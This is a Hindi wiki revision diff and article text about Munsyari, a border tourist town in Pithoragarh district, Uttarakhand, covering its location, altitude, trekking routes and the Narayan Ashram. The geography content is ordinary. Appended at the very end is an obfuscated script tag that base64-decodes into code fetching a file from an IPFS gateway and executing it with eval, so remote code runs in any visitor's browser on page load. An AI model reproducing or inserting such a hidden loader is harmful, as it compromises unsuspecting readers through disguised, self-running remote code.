Difference between revisions of "मुन्स्यारी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
<!-- सबसे पहले इस पन्ने को संजोएँ (सेव करें) जिससे आपको यह दिखेगा कि लेख बनकर कैसा लगेगा -->
+
[[चित्र:Munsyari road.JPG|thumb|पिथौरागढ़ धारचुला-मुन्स्यारी मार्ग]]  
[[चित्र:{{PAGENAME}}|thumb|{{PAGENAME}} लिंक पर क्लिक करके चित्र अपलोड करें]]
+
'''मुन्स्यारी''' [[पिथौरागढ़]] जनपद, [[उत्तराखण्ड]] का प्रमुख पर्यटक केन्द्र तथा [[भारत]] का सीमान्त नगर है। [[तिब्बत]] से व्यापार का प्रमुख केन्द्र मुन्स्यारी गोरी गंगा नदी के तट पर बसा है। इसको लिटिल कश्मीर के नाम से भी जाना जाता है। यहाँ से [[हिमालय]] के ग्लेशियर मिलाम, रालम और नन्दा देवी चोटी के लिये ट्रेकिंग का आधार केन्द्र भी है। यह पिथौरागढ़ से 125 किमी तथा [[अल्मोड़ा]] से 200 किमी है। मुन्स्यारी समुद्र तल से 2298 मीटर की उंचाई पर स्थित है। 
{{पुनरीक्षण}}<!-- कृपया इस साँचे को हटाएँ नहीं (डिलीट न करें)। इसके नीचे से ही सम्पादन कार्य करें। -->
 
'''आपको नया पन्ना बनाने के लिए यह आधार दिया गया है'''
 
[[चित्र:Munsyari road.JPG|thumb|पिथौरागढ़ धारचुला मुन्स्यारी मार्ग]]  
 
[[पिथौरागढ़]] जनपद का प्रमुख पर्यटक केन्द्र तथा भारत का सीमान्त नगर है [[उत्तराखंड]] राज्य का एक नगर है। 
 
तिब्बत से व्यापार का प्रमुख केन्द्र मुन्स्यारी गोरी गंगा नदी के तट पर बसा है इसको लिटिल कश्मीर के नाम से भी जाना जाता है यहां से हिमालय के ग्लेशियर मिलाम, रालम और नन्दा देवी चोटी के लिये ट्रेकिंग का आधार केन्द्र भी है। यह [[पिथौरागढ़]] से 125 किमी तथा [[अल्मोड़ा]] से 200 किमी है। मुन्स्यारी समुद्र तल से 2298 मीटर की उंचाई पर स्थित है इस नगर की आबादी लगभग एक लाख व्यक्तियों की है
 
 
==विशेषता==
 
==विशेषता==
यह तिब्बत का व्यापार मार्ग भी है, इस क्षेत्र मे कुइ ऐसी जनजातियां निवास करती हैं जो अब लुप्त प्राय होने के कगार पर हैं
+
यह तिब्बत का व्यापार मार्ग भी है, इस क्षेत्र मे कुइ ऐसी जनजातियां निवास करती हैं जो अब लुप्त प्राय होने के कगार पर हैं।
 
 
 
==दर्शनीय स्थल ==
 
==दर्शनीय स्थल ==
 +
====नारायण आश्रम====
 +
यहाँ नारायण स्वामी द्वारा 1936 में स्थापित नारायण आश्रम 2734 मीटर की उंचाई पर है जो दर्शनीय है।
  
===नारायण आश्रम===
 
यहां नाराण स्वामी द्वारा 1936 में स्थापित नारायण आश्रम 2734 मीटर की उंचाई पर है जो दर्शनीय है।
 
 
 
<!-- कृपया इस संदेश से ऊपर की ओर ही सम्पादन कार्य करें। ऊपर आप अपनी इच्छानुसार शीर्षक और सामग्री डाल सकते हैं -->
 
  
<!-- यदि आप सम्पादन में नये हैं तो कृपया इस संदेश से नीचे सम्पादन कार्य न करें -->
 
  
 
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==बाहरी कड़ियाँ==
 
  
 
==संबंधित लेख==
 
==संबंधित लेख==
 
+
{{उत्तराखंड के पर्यटन स्थल}}
[[Category:नया पन्ना सितम्बर-2012]]
+
[[Category:उत्तराखंड]]
 
+
[[Category:पर्यटन कोश]]
 +
[[Category:उत्तराखंड के पर्यटन स्थल]]
 
__INDEX__
 
__INDEX__
 +
__NOTOC__

Latest revision as of 08:25, 20 September 2012

thumb|pithauragadh dharachula-munsyari marg munsyari pithauragadh janapad, uttarakhand ka pramukh paryatak kendr tatha bharat ka simant nagar hai. tibbat se vyapar ka pramukh kendr munsyari gori ganga nadi ke tat par basa hai. isako litil kashmir ke nam se bhi jana jata hai. yahaan se himalay ke gleshiyar milam, ralam aur nanda devi choti ke liye trekiang ka adhar kendr bhi hai. yah pithauragadh se 125 kimi tatha almo da se 200 kimi hai. munsyari samudr tal se 2298 mitar ki uanchaee par sthit hai.

visheshata

yah tibbat ka vyapar marg bhi hai, is kshetr me kui aisi janajatiyaan nivas karati haian jo ab lupt pray hone ke kagar par haian.

darshaniy sthal

narayan ashram

yahaan narayan svami dvara 1936 mean sthapit narayan ashram 2734 mitar ki uanchaee par hai jo darshaniy hai.



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh


sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>